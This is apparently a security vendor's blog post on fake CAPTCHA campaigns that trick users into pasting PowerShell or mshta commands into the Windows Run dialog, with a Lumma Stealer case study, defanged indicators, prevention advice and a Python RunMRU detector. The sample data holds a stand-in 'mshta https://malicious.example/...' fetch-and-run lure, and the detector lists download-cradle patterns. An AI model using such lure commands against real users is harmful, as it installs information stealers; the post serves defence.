The Rise of Fake CAPTCHA Attacks
Introduction
Threat actors have been increasingly taking advantage of the forms and verification steps users already expect to encounter while navigating the web. By now, CAPTCHA prompts are commonplace, asking users to prove they are human by picking certain pictures, solving problems, or clicking on something that only a human would successfully complete (see Figure 1). Passing the check typically allows the end user to continue on to the next part of whatever they were doing.
But what if there was a way that this could be abused to infect the end user’s device and result in a compromise? Well, there is.
This blog will discuss the Fake Captcha campaign, what Blackpoint’s Security Operations Center (SOC) has observed, and what you can do to help prevent a successful attack.
Fake CAPTCHA On the Rise
Threat actors have been exploiting users’ trust with newer tactics, techniques, and procedures (TTPs): through fake CAPTCHA prompts, they trick the end user into copying a script and executing it, so that the user infects their own device with malware.

Figure 1: Examples of CAPTCHAs
Blackpoint’s SOC has observed an uptick in this type of campaign, which uses social engineering, specifically these fake CAPTCHA prompts, to trick users into executing malware on their devices. This is one way a threat actor can establish a foothold in an internal network. Threat actors can then use this access for further malicious activity, sell the access on the dark web, or provide access to other threat groups.
There are multiple steps to this campaign, which are broken down below:
- A user receives a phishing email or navigates to a compromised website.
- The user is prompted with further instruction to prove they are “not a robot” (See Figure 1).
- The user is often instructed to click a button with the phrase “I’m not a robot” or something similar (See Figure 2).
- Once the button is clicked, it copies embedded code directly into the victim’s clipboard.
- The user is instructed to open the run command and use “CTRL+v” to paste in the payload that was copied to the clipboard (See Figure 3).
- The user is instructed to hit enter.
These few simple steps convince the unsuspecting user to execute a command on their own system on the threat actor’s behalf. What happens in the background is usually another 3-4 stage process, detailed below:
- Once the payload is copied into the run command and the user presses enter, the victim is typically redirected to a sequence of URLs that result in additional payload deployment.
- The first site often contains a PowerShell command that is used to execute a malicious .ps1 script that calls another site to fetch the final loader.
- In all the observed incidents, the loader has been malicious and has delivered one of many different malware payloads, including Lumma Stealer, SocGholish, NetSupport RAT, AsyncRAT, Venom RAT, XWorm, and more.
After this process is completed, there are multiple possibilities for threat actors. Many of the final payloads are sold as a service and have been tied to multiple ransomware operations, indicating that a successful attack could have devastating impacts on a targeted organization.

Figure 2: Example of “I’m not a robot” button

Figure 3: Example of instructions to execute malicious commands
Blackpoint’s SOC has successfully responded to more than 50 incidents involving this campaign from December 2024 to March 2025. The frequency of these incidents has increased significantly over the last 30 days. These incidents have involved the deployment of at least eight different malware variants. The most commonly observed variant by Blackpoint SOC has been Lumma Stealer. Lumma Stealer is an information-stealing malware that is sold as a service. This stealer has been actively observed since at least 2022, and targets information such as cryptocurrency wallets, credentials, and two-factor authentication browser extensions.
Case Study: Legitimate Company Site Compromised
Blackpoint’s SOC was alerted to suspicious PowerShell usage on two devices within the network of a Professional & Commercial Services (Business Services) partner. These PowerShell commands were indicative of the Fake CAPTCHA campaign and Blackpoint SOC isolated the impacted devices to prevent further malicious activity.
Further investigation into the activity identified the following chain of events:
- The command leveraged the PowerShell cmdlet “Invoke-WebRequest (iwr)” to download a PowerShell script, “34.ps1”, that executes in memory. The PowerShell script was hosted at irp[.]cdn-website[.]com; its main purpose was to download the next stage of the kill chain.
- A successful execution of the script downloads a zip file, “Junction.zip”, and saves it as “a7wm.zip”, from a second domain, “shaileshvisionaryastrologer[.]com”. The zip file then gets extracted to the Temp folder.
- The script then checks whether the malicious binary was successfully extracted. If it was, the binary is executed, the process sleeps for roughly 23 minutes, and the folder as well as the associated zip file are deleted from the host.
- The malicious payload in this incident was determined to be the Lumma Stealer malware.
- The malicious commands have been observed being stored in the following Registry Key: Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

In this incident, further analysis of the overall incident by Blackpoint SOC identified that the victim received the fake CAPTCHA after visiting their own company’s legitimate WordPress site, indicating that this threat actor had likely compromised the legitimate site and was using it as a “watering hole” to trick users into falling for the fake CAPTCHA prompt.
While the malware observed in these campaigns has been wide-ranging, one common observation in the majority of these incidents is the use of mshta, in the form “mshta https://<malicious.domain>/media.file #<comment>”. Blackpoint SOC has had detection rules in place for this type of tactic since early 2022. While the fake CAPTCHA portion of this campaign and the malware used may have evolved, threat actors continue to revert, and likely will continue to revert, to tried-and-true methods of execution over the next 12 months.
Initial Access
Threat actors likely compromised the company’s own WordPress website and conducted a watering hole attack, which refers to a strategic web compromise, typically of a site visited by a specific community, such as a specific vertical or region (MITRE ATT&CK: T1189).
Once the victim visited the site, they were presented with a CAPTCHA, oftentimes a trusted verification process. When the victim completed the CAPTCHA and clicked the verify button, the PowerShell script that resulted in an alert was copied to the victim’s clipboard. The victim was then likely instructed to paste that script into the Windows Run Prompt.
Once the script was executed (MITRE ATT&CK: T1059.001), Blackpoint SOC was alerted and the impacted devices were successfully isolated.
Strong Prevention Through Awareness
Once a threat actor gains access to a victim environment and malware is deployed, the possibilities are endless. Malware such as remote access trojans (RATs) as well as information stealers are common malware variants seen post-compromise.
It is imperative that organizations ensure the proper security measures are in place and that employees understand how to identify and mitigate the risk that these types of threats create.
The most effective method for preventing this type of incident is to provide proper security awareness training to all users.
Key Steps to Prevent:
- Prior to interacting with a CAPTCHA prompt, ensure the website you’re visiting is the legitimate and intended website and that it has not been compromised.
  - Basic rule of thumb: if the website does not align with the attempted activity, it is likely spoofed.
  - The URL can be copied and pasted into several open-source intelligence (OSINT) websites, such as VirusTotal or Censys, to view the reputation of the website or IP address.
- In the event the user does interact with the CAPTCHA, any instructions to open a run command (Windows key+R) and paste something into it should be treated as likely malicious.
  - Inform users to avoid following through with these steps and to notify their organization’s security contact immediately.
  - Execution via the Run dialog is logged in Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
  - We have seen malware clear these entries after execution.
- Avoid opening emails from unknown senders and avoid opening unexpected attachments or links without verifying their legitimacy first.
- Ensure employees are aware of the process for reporting suspicious emails to their incident response or security teams.
- Avoid downloading cracked or purported “free” software; stick to legitimate marketplaces to avoid accidentally downloading malware alongside the software.
- Implement the principle of least privilege.
- To the extent possible, limit direct call-outs to external URLs and IP addresses.
  - We have seen these campaigns frequently rely on uncommon TLDs.
- Again, to the extent possible, limit the use of scripting languages, such as PowerShell.
  - You can utilize our Managed Application Control to custom-block mshta.exe, which is commonly seen in these campaigns.
- Enable pop-up blockers to prevent one avenue of automatic malware download.
- Ensure that proper security products are integrated into workstations and servers and that the alerts are being reviewed by security professionals.
  - In the case study above, Blackpoint SOC isolated these devices within 3 minutes of the alert. A “human-in-the-loop” approach is extremely important in making the difference between a successful compromise and an unsuccessful attempt.
- Implement a patch management program to ensure devices and software are kept up to date.
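As an added example (not Blackpoint’s tooling or detection rules), the following Python takes the RunMRU values in the shape Windows stores them (single-letter value names ending in "\1", plus an "MRUList" ordering string), flags Run-dialog commands that fit the mshta and PowerShell download patterns described in the case study, and checks for the entry clearing mentioned above. The sample registry values, the domain, and the tampering heuristic are constructed assumptions.

```python
import re

# Constructed sample of HKCU\...\Explorer\RunMRU values (not real forensic data).
# Windows stores each Run-dialog command under a single-letter value name with a
# trailing "\1"; the "MRUList" value lists those names most-recent-first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://malicious.example/media.file #I am not a robot\\1",
}

# Patterns for the execution styles described in the post: mshta pulling a remote
# file (with the trailing "#<comment>" lure) and PowerShell download cradles.
SUSPICIOUS = [
    (re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I), "mshta executing remote content"),
    (re.compile(r"\b(powershell|pwsh)\b", re.I), "PowerShell launched from the Run dialog"),
    (re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod)\b", re.I), "download cradle"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory script execution"),
    (re.compile(r"https?://\S+.*\s#\S", re.I), "URL followed by a # comment (lure text)"),
]

def ordered_commands(values):
    """Return Run-dialog commands most-recent-first, with the '\\1' suffix stripped."""
    commands = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue  # named in MRUList but gone; see tampering_indicators()
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands

def classify(command):
    """Return the reasons a single Run-dialog command matches the campaign's patterns."""
    return [reason for pattern, reason in SUSPICIOUS if pattern.search(command)]

def audit(values):
    """Return (command, reasons) for every suspicious entry, preserving MRU order."""
    scored = ((c, classify(c)) for c in ordered_commands(values))
    return [(c, reasons) for c, reasons in scored if reasons]

def tampering_indicators(values):
    """Heuristic (an assumption, not from the post): names in MRUList whose value is
    gone, and stored values absent from MRUList. Either suggests entries were removed
    directly, consistent with the post's note that malware clears them after running."""
    stored = set(values) - {"MRUList"}
    listed = set(values.get("MRUList", ""))
    return sorted(listed - stored), sorted(stored - listed)
```

On a live Windows host the same dictionary can be populated from the key with the standard-library `winreg` module; here the values are embedded so the check runs offline.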
Conclusion
The malware variants observed throughout this campaign have varied; however, the overall behavior within the campaign has remained relatively the same. These malware variants are sold as a service, making attribution to a specific threat actor difficult; however, proactive, intelligence-driven security measures can help prevent this campaign from remaining successful.
Blackpoint’s SOC has continuously identified and prevented this type of attack, removing threat actors from compromised hosts, and will continue to take action and notify customers of new instances of the activity in the future.
Author: Caden Toellner, Sr. MDR Analyst
Date published: March 20, 2025
Author: Blackpoint Cyber